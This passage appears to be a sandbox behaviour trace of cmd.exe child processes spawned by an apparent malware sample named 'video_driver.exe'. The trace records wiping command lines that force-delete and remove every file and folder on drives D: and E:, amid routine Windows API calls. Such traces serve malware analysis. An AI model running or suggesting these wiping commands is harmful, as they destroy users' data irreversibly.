lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x0, lpData=0x39ee60*=0x40, lpcbData=0x39ee58*=0x1000) returned 0x2 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x1, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x0, lpData=0x39ee60*=0x1, lpcbData=0x39ee58*=0x1000) returned 0x2 [0066.898] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x0, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.898] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x9, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.898] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x9, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.898] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x0, lpData=0x39ee60*=0x9, lpcbData=0x39ee58*=0x1000) returned 0x2 [0066.898] RegCloseKey (hKey=0x68) returned 0x0 [0066.898] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0066.898] srand (_Seed=0x5eb34b6c) [0066.898] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q" [0066.898] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q" [0066.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.898] GetProcessHeap () returned 0x3f0000 [0066.898] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x210) returned 0x4020f8 [0066.898] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x402100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0066.899] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0066.899] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0066.899] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.899] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0066.899] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0066.899] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0066.899] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0066.899] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0066.899] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0066.899] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0066.899] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.899] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0066.899] GetProcessHeap () returned 0x3f0000 [0066.899] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x402bd0 | out: hHeap=0x3f0000) returned 1 [0066.899] GetEnvironmentStringsW () returned 0x402310* [0066.899] GetProcessHeap () returned 0x3f0000 [0066.899] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xae2) returned 0x404c70 [0066.900] FreeEnvironmentStringsW (penv=0x402310) returned 1 [0066.900] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0066.900] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.900] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0066.900] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0066.900] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0066.900] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0066.900] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0066.900] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0066.900] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0066.900] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0066.900] GetProcessHeap () returned 0x3f0000 [0066.900] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x54) returned 0x4017c8 [0066.900] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39fc20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39fc20, lpFilePart=0x39fc1c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39fc1c*="Desktop") returned 0x25 [0066.901] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.901] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f99c | out: lpFindFileData=0x39f99c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x405760 [0066.901] FindClose (in: hFindFile=0x405760 | out: hFindFile=0x405760) returned 1 [0066.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f99c | out: lpFindFileData=0x39f99c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x405760 [0066.901] FindClose (in: hFindFile=0x405760 | out: hFindFile=0x405760) returned 1 [0066.901] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0066.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f99c | out: lpFindFileData=0x39f99c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x405760 [0066.902] FindClose (in: hFindFile=0x405760 | out: hFindFile=0x405760) returned 1 [0066.902] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.902] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0066.902] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.902] GetProcessHeap () returned 0x3f0000 [0066.902] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404c70 | out: hHeap=0x3f0000) returned 1 [0066.902] GetEnvironmentStringsW () returned 0x404180* [0066.902] GetProcessHeap () returned 0x3f0000 [0066.902] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb36) returned 0x405fa0 [0066.903] FreeEnvironmentStringsW (penv=0x404180) returned 1 [0066.903] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.903] GetProcessHeap () returned 0x3f0000 [0066.903] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4017c8 | out: hHeap=0x3f0000) returned 1 [0066.903] GetProcessHeap () returned 0x3f0000 [0066.903] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400e) returned 0x406ae0 [0066.904] GetProcessHeap () returned 0x3f0000 [0066.904] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa0) returned 0x402e50 [0066.904] GetProcessHeap () returned 0x3f0000 [0066.904] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406ae0 | out: hHeap=0x3f0000) returned 1 [0066.904] GetConsoleOutputCP () returned 0x1b5 [0066.904] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.904] GetUserDefaultLCID () returned 0x409 [0066.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0066.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39fd60, cchData=128 | out: lpLCData="0") returned 2 [0066.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39fd60, cchData=128 | out: lpLCData="0") returned 2 [0066.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39fd60, cchData=128 | out: lpLCData="1") returned 2 [0066.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0066.905] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0066.906] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0066.906] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0066.908] GetProcessHeap () returned 0x3f0000 [0066.908] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20c) returned 0x402ef8 [0066.908] GetConsoleTitleW (in: lpConsoleTitle=0x402ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0066.908] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.908] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0066.908] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0066.908] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0066.909] GetProcessHeap () returned 0x3f0000 [0066.909] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x406ae0 [0066.909] GetProcessHeap () returned 0x3f0000 [0066.909] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4008) returned 0x40aaf8 [0066.910] GetProcessHeap () returned 0x3f0000 [0066.910] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1a) returned 0x4057e0 [0066.910] GetEnvironmentVariableW (in: lpName="p IN (\"D", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="CD") returned 13 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="ERRORLEVEL") returned 11 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="CMDEXTVERSION") returned 13 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="CMDCMDLINE") returned 13 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="DATE") returned 12 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="TIME") returned -4 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="RANDOM") returned -2 [0066.910] _wcsicmp (_String1="p IN (\"D", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.910] GetProcessHeap () returned 0x3f0000 [0066.910] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4057e0 | out: hHeap=0x3f0000) returned 1 [0066.910] GetProcessHeap () returned 0x3f0000 [0066.910] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40aaf8 | out: hHeap=0x3f0000) returned 1 [0066.910] GetProcessHeap () returned 0x3f0000 [0066.910] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4008) returned 0x40aaf8 [0066.910] GetProcessHeap () returned 0x3f0000 [0066.910] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40aaf8 | out: hHeap=0x3f0000) returned 1 [0066.910] GetProcessHeap () returned 0x3f0000 [0066.910] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x406ae0 | out: hHeap=0x3f0000) returned 1 [0066.911] _wcsicmp (_String1="if", _String2=")") returned 64 [0066.911] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0066.911] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0066.911] _wcsicmp (_String1="IF", _String2="if") returned 0 [0066.911] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0066.911] GetProcessHeap () returned 0x3f0000 [0066.911] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x403110 [0066.911] GetProcessHeap () returned 0x3f0000 [0066.911] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xe) returned 0x3fffc0 [0066.912] GetProcessHeap () returned 0x3f0000 [0066.912] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4057e0 [0066.912] GetProcessHeap () returned 0x3f0000 [0066.912] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4057e0, Size=0x16) returned 0x401800 [0066.912] GetProcessHeap () returned 0x3f0000 [0066.912] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x401800) returned 0x16 [0066.912] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0066.913] GetProcessHeap () returned 0x3f0000 [0066.913] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x403170 [0066.913] GetProcessHeap () returned 0x3f0000 [0066.913] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x14) returned 0x4031d0 [0066.913] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0066.913] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0066.913] GetProcessHeap () returned 0x3f0000 [0066.914] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x12) returned 0x4031f0 [0066.914] GetProcessHeap () returned 0x3f0000 [0066.914] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1c) returned 0x4057e0 [0066.914] GetProcessHeap () returned 0x3f0000 [0066.914] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4057e0, Size=0x14) returned 0x403210 [0066.914] GetProcessHeap () returned 0x3f0000 [0066.914] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x403210) returned 0x14 [0066.914] _wcsicmp (_String1="del", _String2=")") returned 59 [0066.914] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0066.914] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0066.914] _wcsicmp (_String1="IF", _String2="del") returned 5 [0066.914] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0066.914] _wcsicmp (_String1="REM", _String2="del") returned 14 [0066.914] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0066.914] GetProcessHeap () returned 0x3f0000 [0066.914] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x403230 [0066.914] GetProcessHeap () returned 0x3f0000 [0066.915] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x10) returned 0x3fffd8 [0066.915] GetProcessHeap () returned 0x3f0000 [0066.915] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x403290 [0066.916] GetProcessHeap () returned 0x3f0000 [0066.916] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x4032c0 [0066.916] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0066.916] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0066.916] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0066.916] GetProcessHeap () returned 0x3f0000 [0066.916] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x403320 [0066.916] GetProcessHeap () returned 0x3f0000 [0066.916] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x44) returned 0x403380 [0066.917] GetProcessHeap () returned 0x3f0000 [0066.917] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x14) returned 0x4033d0 [0066.917] GetProcessHeap () returned 0x3f0000 [0066.917] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4033d0, Size=0x12) returned 0x4033d0 [0066.917] GetProcessHeap () returned 0x3f0000 [0066.917] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x4033d0) returned 0x12 [0066.917] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0066.917] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0066.918] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0066.918] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0066.918] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0066.918] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0066.918] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0066.919] GetProcessHeap () returned 0x3f0000 [0066.919] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x12) returned 0x4033f0 [0066.919] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.920] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.920] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.920] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.920] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.920] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.920] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.920] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.920] GetProcessHeap () returned 0x3f0000 [0066.920] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x403410 [0066.920] GetProcessHeap () returned 0x3f0000 [0066.920] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x14) returned 0x403470 [0066.921] GetProcessHeap () returned 0x3f0000 [0066.921] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4057e0 [0066.922] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.924] GetFullPathNameW (in: lpFileName="D:", nBufferLength=0x208, lpBuffer=0x39fa50, lpFilePart=0x39f7fc | out: lpBuffer="D:\\", lpFilePart=0x39f7fc*=0x0) returned 0x3 [0066.924] wcsncmp (_String1="D:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -24 [0066.929] GetFileAttributesW (lpFileName="D:\\" (normalized: "d:")) returned 0xffffffff [0066.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.930] SetConsoleInputExeNameW () returned 0x1 [0066.930] GetConsoleOutputCP () returned 0x1b5 [0066.930] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.931] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.931] exit (_Code=0) Process: id = "50" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41c59000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 78 os_tid = 0xaa4 [0067.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf834 | out: lpSystemTimeAsFileTime=0x2cf834*(dwLowDateTime=0x5c152e0, dwHighDateTime=0x1d62400)) [0067.021] GetCurrentProcessId () returned 0xaa8 [0067.021] GetCurrentThreadId () returned 0xaa4 [0067.021] GetTickCount () returned 0x11482e6 [0067.021] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf82c | out: lpPerformanceCount=0x2cf82c*=18715412997) returned 1 [0067.023] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.023] __set_app_type (_Type=0x1) [0067.023] __p__fmode () returned 0x770331f4 [0067.024] __p__commode () returned 0x770331fc [0067.024] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.024] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.024] GetCurrentThreadId () returned 0xaa4 [0067.024] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa4) returned 0x60 [0067.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.025] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.025] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.034] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.034] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf7c4 | out: phkResult=0x2cf7c4*=0x0) returned 0x2 [0067.034] VirtualQuery (in: lpAddress=0x2cf7fb, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.034] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.034] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.034] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.034] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf794, dwLength=0x1c | out: lpBuffer=0x2cf794*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.035] GetConsoleOutputCP () returned 0x1b5 [0067.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.035] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.035] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.036] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.036] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.036] GetEnvironmentStringsW () returned 0x6a20f8* [0067.036] GetProcessHeap () returned 0x690000 [0067.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a2bd0 [0067.037] FreeEnvironmentStringsW (penv=0x6a20f8) returned 1 [0067.037] GetProcessHeap () returned 0x690000 [0067.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x6a1898 [0067.037] 